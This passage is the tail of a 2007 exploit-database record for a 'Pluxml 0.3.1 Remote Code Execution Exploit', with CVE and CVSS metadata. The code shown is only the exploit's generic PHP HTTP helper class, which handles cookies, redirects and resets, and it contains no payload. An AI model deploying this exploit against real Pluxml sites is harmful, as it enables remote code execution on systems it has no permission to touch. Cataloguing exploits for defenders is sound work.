precised\");\n\n\t\t$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);\n\n\t\tif($this->port > 65535)\n\t\t die(\"Error: Invalid port number\");\n\t}\n\t\n\t\n\t/**\n\t * If you call this function,\n\t * the script will extract all\n\t * 'Set-Cookie' headers values\n\t * and it will automatically add\n\t * them into the 'Cookie' header\n\t * for all next requests.\n\t *\n\t * @access public\n\t * @param integer code 1(enabled) 0(disabled)\n\t * @example $this->cookiejar(0)\n\t * @example $this->cookiejar(1)\n\t * \n\t */\n\tfunction cookiejar($code)\n\t{\n\t\tif($code=='0')\n\t\t $this->cookiejar=FALSE;\n\n\t\telseif($code=='1')\n\t\t $this->cookiejar=TRUE;\n\t}\n\n\n\t/**\n\t * If you call this function,\n\t * the script will follow all\n\t * redirections sent by the server.\n\t * \n\t * @access public\n\t * @param integer code 1(enabled) 0(disabled)\n\t * @example $this->allowredirection(0)\n\t * @example $this->allowredirection(1)\n\t * \n\t */\n\tfunction allowredirection($code)\n\t{\n\t\tif($code=='0')\n\t\t $this->allowredirection=FALSE;\n\t\t \n\t\telseif($code=='1')\n\t\t $this->allowredirection=TRUE;\n\t}\n\n\t\n\t/**\n\t * This function is called if\n\t * allowredirection() is enabled.\n\t * You don't have to call it.\n\t *\n\t * @access private\n\t * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)\n\t * @return string $this->get($this->last_redirection)\n\t * @return string $this->recv;\n\t * \n\t */\n\tfunction getredirection()\n\t{\n\t\tif(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))\n\t\t{\n\t\t\t$this->last_redirection = trim($codearr[2]);\n\t\t\t\n\t\t\tif(!ereg('://',$this->last_redirection))\n\t\t\t return $this->get('http://'.$this->host.$this->path.$this->last_redirection);\n\n\t\t\telse\n\t\t\t return $this->get($this->last_redirection);\n\t\t}\n\t\telse\n\t\t return $this->recv;\n\t}\n\n\n\t/**\n\t * This function allows you\n\t * to reset some parameters.\n\t * \n\t * @access public\n\t * @param string func Param\n\t * @example $this->reset('header')\n\t * @example $this->reset('cookie')\n\t * @example $this->reset()\n\t * \n\t */\n\tfunction reset($func='')\n\t{\n\t\tswitch($func)\n\t\t{\n\t\t\tcase 'header':\n\t\t\t$this->header = array('');\n\t\t\tbreak;\n\t\t\t\t\n\t\t\tcase 'cookie':\n\t\t\t$this->cookie = array('');\n\t\t\tbreak;\n\t\t\t\t\n\t\t\tdefault:\n\t\t\t$this->cookiejar = '';\n\t\t\t$this->header = array('');\n\t\t\t$this->cookie = array('');\n\t\t\t$this->allowredirection = '';\n\t\t\tbreak;\n\t\t}\n\t}\n}\n?>\n\n# milw0rm.com [2007-06-24]\n", "published": "2007-06-24T00:00:00", "href": "https://www.exploit-db.com/exploits/4096/", "osvdbidlist": ["42420", "38890"], "reporter": "DarkFig", "hash": "8e1e647195fb8c75a12fd73f61bac65a51109453b8b85c9433b3febb2d3f514e", "title": "Pluxml 0.3.1 - Remote Code Execution Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Pluxml 0.3.1 Remote Code Execution Exploit. CVE-2007-3432,CVE-2007-3542. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4096/", "viewCount": 1, "enchantments": {"vulnersScore": 9.0}}